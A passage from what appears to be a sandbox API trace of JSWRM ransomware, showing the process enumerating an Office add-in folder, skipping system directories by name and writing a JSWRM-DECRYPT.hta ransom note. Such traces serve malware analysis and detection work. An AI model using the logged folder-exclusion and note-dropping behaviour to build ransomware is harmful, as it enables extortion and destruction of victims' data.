hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0125.559] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c66c57, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16166f59, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16166f59, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="th", cAlternateFileName="")) returned 1 [0125.559] lstrcmpiW (lpString1="th", lpString2=".") returned 1 [0125.559] lstrcmpiW (lpString1="th", lpString2="..") returned 1 [0125.559] lstrcmpiW (lpString1="th", lpString2="...") returned 1 [0125.559] lstrcmpiW (lpString1="th", lpString2="windows") returned -1 [0125.559] lstrcmpiW (lpString1="th", lpString2="recovery") returned 1 [0125.559] lstrcmpiW (lpString1="th", lpString2="perflogs") returned 1 [0125.559] lstrcmpiW (lpString1="th", lpString2="documents and settings") returned 1 [0125.559] lstrcmpiW (lpString1="th", lpString2="$RECYCLE.BIN") returned 1 [0125.559] lstrcmpiW (lpString1="th", lpString2="system volume information") returned 1 [0125.559] lstrcmpiW (lpString1="th", lpString2="msocache") returned 1 [0125.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0125.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0125.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0125.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0125.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0125.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0125.559] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\th\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\th\\jswrm-decrypt.hta")) returned 0xffffffff [0125.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0125.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0125.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x2501e8 [0125.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0125.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x251fb8 [0125.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0125.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0125.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0125.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\th\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\th\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.563] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.563] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.564] CloseHandle (hObject=0x314) returned 1 [0125.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0125.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x251fb8 | out: hHeap=0x1e0000) returned 1 [0125.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0125.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0125.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0125.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0125.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0125.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0125.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0125.565] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\th\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\th\\jswrm-decrypt.hta")) returned 0x20 [0125.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0125.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0125.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0125.565] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\th\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c66c57, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16166f59, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x417f1ac8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0125.566] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.566] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c66c57, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16166f59, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x417f1ac8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0125.566] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.566] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.566] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1c66c57, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1c66c57, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x161b33fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc3c40, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0125.566] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0125.566] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0125.566] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0125.566] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0125.566] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0125.566] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0125.566] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0125.566] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.566] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0125.566] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0125.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0125.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0125.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0125.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0125.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0125.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0125.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0125.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0125.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0125.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0125.567] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x417f1ac8, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x417f1ac8, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x418189cc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.567] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.567] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.567] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.567] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.567] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.567] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.567] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.567] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.567] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.567] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0125.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0125.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0125.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0125.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0125.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0125.567] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa5581c0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa5581c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa853100, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1baa8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.567] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.567] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.567] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.567] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.567] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.567] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.567] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.567] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.568] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.568] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0125.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0125.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0125.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0125.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d298, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0125.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0125.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0125.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0125.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0125.568] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x624ad43, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x624ad43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x624ad43, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14ad8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.568] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0125.568] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0125.568] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0125.568] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0125.568] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0125.568] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0125.568] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0125.568] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.568] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0125.568] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0125.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0125.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0125.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0125.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0125.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f3a8 [0125.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0125.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.569] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf81bae82, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf81bae82, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf8574958, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5aa8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.569] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0125.569] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0125.569] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0125.569] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0125.569] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0125.569] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0125.569] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0125.569] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.569] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0125.569] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0125.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0125.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0125.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0125.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0125.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 